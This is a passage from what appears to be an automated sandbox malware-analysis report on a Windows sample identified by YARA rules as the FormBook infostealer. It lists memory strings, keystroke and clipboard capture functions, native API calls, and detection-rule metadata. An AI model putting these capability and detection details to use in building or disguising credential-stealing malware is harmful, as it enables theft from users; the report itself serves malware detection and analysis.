Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00420CC0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0043DD3C GetKeyboardState, 0_2_0043DD3C

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture, 0_2_00440CB8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045BA98 NtdllDefWindowProc_A, 0_2_0045BA98
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_0045C240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_0045C2F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042A524 NtdllDefWindowProc_A, 0_2_0042A524
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_00450C40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417940 NtCreateFile, 1_2_00417940
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004179F0 NtReadFile, 1_2_004179F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417A70 NtClose, 1_2_00417A70
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417B20 NtAllocateVirtualMemory, 1_2_00417B20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004178FA NtCreateFile, 1_2_004178FA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041793A NtCreateFile, 1_2_0041793A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004179EA NtReadFile, 1_2_004179EA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00AF98F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00AF9860
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk, 1_2_00AF9840
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk, 1_2_00AF99A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00AF9910
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk, 1_2_00AF9A20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00AF9A00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk, 1_2_00AF9A50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF95D0 NtClose,LdrInitializeThunk, 1_2_00AF95D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk, 1_2_00AF9540
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00AF96E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00AF9660
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00AF97A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00AF9780
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00AF9FE0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00AF9710
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF98A0 NtWriteVirtualMemory, 1_2_00AF98A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9820 NtEnumerateKey, 1_2_00AF9820
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFB040 NtSuspendThread, 1_2_00AFB040
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF99D0 NtCreateProcessEx, 1_2_00AF99D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9950 NtQueueApcThread, 1_2_00AF9950
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A80 NtOpenDirectoryObject, 1_2_00AF9A80
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A10 NtQuerySection, 1_2_00AF9A10
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFA3B0 NtGetContextThread, 1_2_00AFA3B0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9B00 NtSetValueKey, 1_2_00AF9B00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF95F0 NtQueryInformationFile, 1_2_00AF95F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9520 NtWaitForSingleObject, 1_2_00AF9520
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFAD30 NtSetContextThread, 1_2_00AFAD30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9560 NtWriteFile, 1_2_00AF9560
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF96D0 NtCreateKey, 1_2_00AF96D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9610 NtEnumerateValueKey, 1_2_00AF9610
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9670 NtQueryInformationProcess, 1_2_00AF9670
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9650 NtQueryValueKey, 1_2_00AF9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87A70 NtClose, 5_2_02D87A70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87B20 NtAllocateVirtualMemory, 5_2_02D87B20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D879F0 NtReadFile, 5_2_02D879F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87940 NtCreateFile, 5_2_02D87940
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D878FA NtCreateFile, 5_2_02D878FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D879EA NtReadFile, 5_2_02D879EA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8793A NtCreateFile, 5_2_02D8793A
Detected potential crypto function
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00450C40 0_2_00450C40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00455F90 0_2_00455F90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00401026 1_2_00401026
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041B10C 1_2_0041B10C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00408A50 1_2_00408A50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041BB67 1_2_0041BB67
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041ADA4 1_2_0041ADA4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041BF77 1_2_0041BF77
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B820A8 1_2_00B820A8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB090 1_2_00ACB090
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B828EC 1_2_00B828EC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8E824 1_2_00B8E824
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71002 1_2_00B71002
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABF900 1_2_00ABF900
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B822AE 1_2_00B822AE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEEBB0 1_2_00AEEBB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7DBD2 1_2_00B7DBD2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B703DA 1_2_00B703DA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82B28 1_2_00B82B28
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC841F 1_2_00AC841F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7D466 1_2_00B7D466
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B825DD 1_2_00B825DD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB0D20 1_2_00AB0D20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82D07 1_2_00B82D07
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81D55 1_2_00B81D55
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82EF7 1_2_00B82EF7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD6E30 1_2_00AD6E30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7D616 1_2_00B7D616
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81FF1 1_2_00B81FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D78A50 5_2_02D78A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8BB67 5_2_02D8BB67
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8B10C 5_2_02D8B10C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72FB0 5_2_02D72FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8BF77 5_2_02D8BF77
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8AD9D 5_2_02D8AD9D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72D90 5_2_02D72D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72D87 5_2_02D72D87
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 00403FC0 appears 68 times
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 00ABB150 appears 45 times
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 004060D4 appears 62 times
PE file contains strange resources
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
Yara signature match
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
